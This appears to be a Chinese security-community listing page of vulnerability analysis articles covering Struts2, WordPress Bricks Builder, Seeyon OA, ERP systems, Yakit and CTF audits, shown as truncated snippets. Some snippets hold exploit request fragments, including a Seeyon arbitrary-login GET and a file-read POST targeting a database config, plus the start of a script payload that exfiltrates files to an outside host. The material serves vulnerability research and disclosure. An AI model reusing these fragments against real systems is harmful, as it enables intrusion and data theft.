Struts2 S2-066漏洞浅析

Struts2 S2-066漏洞浅析 环境搭建 可以使用官方的showcase https://archive.apache.org/dist/struts/6.3.0/ 也可以IDEA maven struts2模版直接生成 uploadAction package com.struts2; import com.opensymphony.xwork2.ActionSupport; impor

· 1357浏览 · 2024-02-24 14:14
WordPress Bricks Builder RCE(CVE-2024-25600)分析

WordPress Bricks Builder RCE(CVE-2024-25600)分析 前言 在玩手机的时候看到了一公众号的推文,标题是WordPress爆炸0day 直接RCE! ,标题有点夸张,我以为是Wordpress本身的漏洞,点了进去看到是一个名为Bricks Builder插件的未授权RCE漏洞,但是只给出了payload,看到了payload于是在网上找分析文章,并没有找到,于

· 3570浏览 · 2024-02-24 14:07
云时空ERP系统多个SQL注入漏洞分析

service SQL 注入漏洞 未授权接口寻找 在前面的文章中我们可以知道,系统的鉴权依赖于shiro,在spring-context-shiro的XML配置定义了一个叫做shiroFilterChainDefinitions的Spring bean,它是一个String类型的bean,用于定义Apache Shiro框架用于URL模式匹配的权限和访问控制规则。 在配置文件中,是通过定义一个类型

· 1168浏览 · 2024-02-21 16:09
记一次白盒审计解决CTF题目

在做某次比赛题目遇到的一道CMS渗透的题目,www.zip 泄露了源代码,需要现场代码审计漏洞。在系统的网站设置里写入恶意语句后在工具首页生成处重新生成一个PHP文件。 下面是审计过程: 因为是后台漏洞,我们直接去看admin目录下的index.php文件看下路由怎么写的,两个变量一个m一个c,根据分析就知道$model是控制功能点具体对应的哪个文件,$action则对应着文件的具体哪个函数

· 825浏览 · 2024-02-21 05:15
Symphony代码审计-JAVA

0x00 前言 产品说明: Symphony一款用 Java 实现的现代化社区(论坛/BBS/社交网络/博客)平台,实现了面向内容讨论的论坛、面向知识问答的社区、包含了面向用户分享、交友、游戏的社交网络,100% 开源。 审计源码下载地址: https://github.com/88250/symphony/archive/refs/tags/v3.6.3.zip 环境说明: IntelliJ I

· 4157浏览 · 2024-02-21 02:27
云时空ERP系统任意文件上传漏洞分析

路由分析 核心路由在WEB-INF/web.xml配置文件中,部分内容如下图 定义了Servlet组件,和过滤器。从web.xml配置来看,我们可以知道这个应用使用了Spring框架进行Web开发,配置了多个Servlet用于不同的功能,如表单处理、文件上传下载等,同时整合了Apache Shiro进行安全控制,另外还配置了字符编码和跨域资源共享的处理。 其中并没有Servlet的专门鉴权机制

· 1223浏览 · 2024-02-20 16:06
Allegra 一系列CVE漏洞分析

二月份zdi公布了Allegra一系列的漏洞,包括硬编码、文件读取、文件上传、zipslip、反序列化等漏洞,简单记了一下。 Allegra是国外的一个项目管理系统,官方链接:https://www.trackplus.com/ 影响版本 Allegra < 7.5.1 任意文件读取( CVE-2024-22507) Allegra使用struts开发,支持foo!method的方式处理

· 759浏览 · 2024-02-20 10:18
致远OA A8-V5 任意用户登录漏洞分析

致远OA A8-V5 任意用户登录漏洞分析 漏洞环境 致远A8 V7.0 漏洞利用 接口 /seeyon/thirdpartyController.do GET /seeyon/thirdpartyController.do?method=access&enc=TT5uZnR0YmhmL21qb2wvY2N0L3BxZm8nTj4uODM4NDE0MzEyNDM0NTg1OTI3OSdVP

· 5040浏览 · 2024-02-20 10:04
致远OA A8-V5 任意文件读取漏洞分析

致远OA A8-V5 任意文件读取漏洞分析 漏洞环境 致远A8 V7.0 漏洞利用 读取./../../base/conf/datasourceCtp.properties路径下的数据库配置文件 POST /seeyon/officeservlet HTTP/1.1 Host: 10.0.103.21 Pragma: no-cache Cache-Control: no-cache Upgrade

· 3182浏览 · 2024-02-20 10:01
致远OA rest接口重置密码漏洞分析

复现环境 致远 V7.1SP1 补丁分析 致远官方在2023年8月发布了rest接口重置密码漏洞补丁,补丁链接https://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=175 致远是通过jersey框架实现REST接口,通过配置init-pa

· 5465浏览 · 2024-02-20 09:38
致远OA A8.0 SP2 Ajax.do调用formulaManager任意文件上传漏洞分析

致远OA A8.0 SP2 Ajax.do调用formulaManager任意文件上传漏洞分析 漏洞环境 致远A8.0 SP2 (需要登录) 漏洞利用 POST /seeyon/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1 Host: 10.0.103.5 Con

· 2619浏览 · 2024-02-20 09:32
致远OA ofd解压漏洞分析

环境 A8+集团版V8.0SP2 补丁对比 下载官网补丁 https://service.seeyon.com/patchtools/tp.html#/patchList?type=%E5%AE%89%E5%85%A8%E8%A1%A5%E4%B8%81&id=166 通过与A8+集团版V8.0SP2 中的seeyon-apps-edoc/com/seeyon/apps/govdoc/g

· 1635浏览 · 2024-02-20 09:25
yakit CVE-2023-40023漏洞分析

漏洞简介 由Medi0cr1ty师傅发布在公众号的,通过在页面上嵌入一个js,这里的payload是读取文件,并以base64的方式发送出去 <script> const xhr = new XMLHttpRequest(); xhr.open("POST", "http://yakit.com/filesubmit"); xhr.setRequestHeader("Con

· 2447浏览 · 2024-02-20 08:01
【代码审计智能家居】Home Assistant软件代码审计到CVE

翻译原文链接:https://github.blog/2023-11-30-securing-our-home-labs-home-assistant-code-review/ GitHub安全实验室对我们在个人实验室中最常使用的开源软件进行了安全检查,目的是提高其安全性能。以下是我们发现的问题,您可以采取对应的措施来加强您智能家居的安全防护。 【智能家居代码审计】Home Assistant软

· 1557浏览 · 2024-02-18 03:16
zhicms从前台SQL注入到RCE

0x00 前言 产品说明: ZhiCms是一款专业的值得买系统,程序支持国内值得买海淘值得买,程序内置淘点金、以及亿起发淘金链、多麦多金链等功能。 支持国内商城海淘商城 ,程序PHP+MYSQL小巧方便,SEO性强,前台模板制作简单 最新源码下载地址: https://www.zhicms.cc/d/zhicms.zip 环境说明: PHP7.1.9+MYSQL 0x01 软件目录结构 /app

· 1224浏览 · 2024-02-19 14:47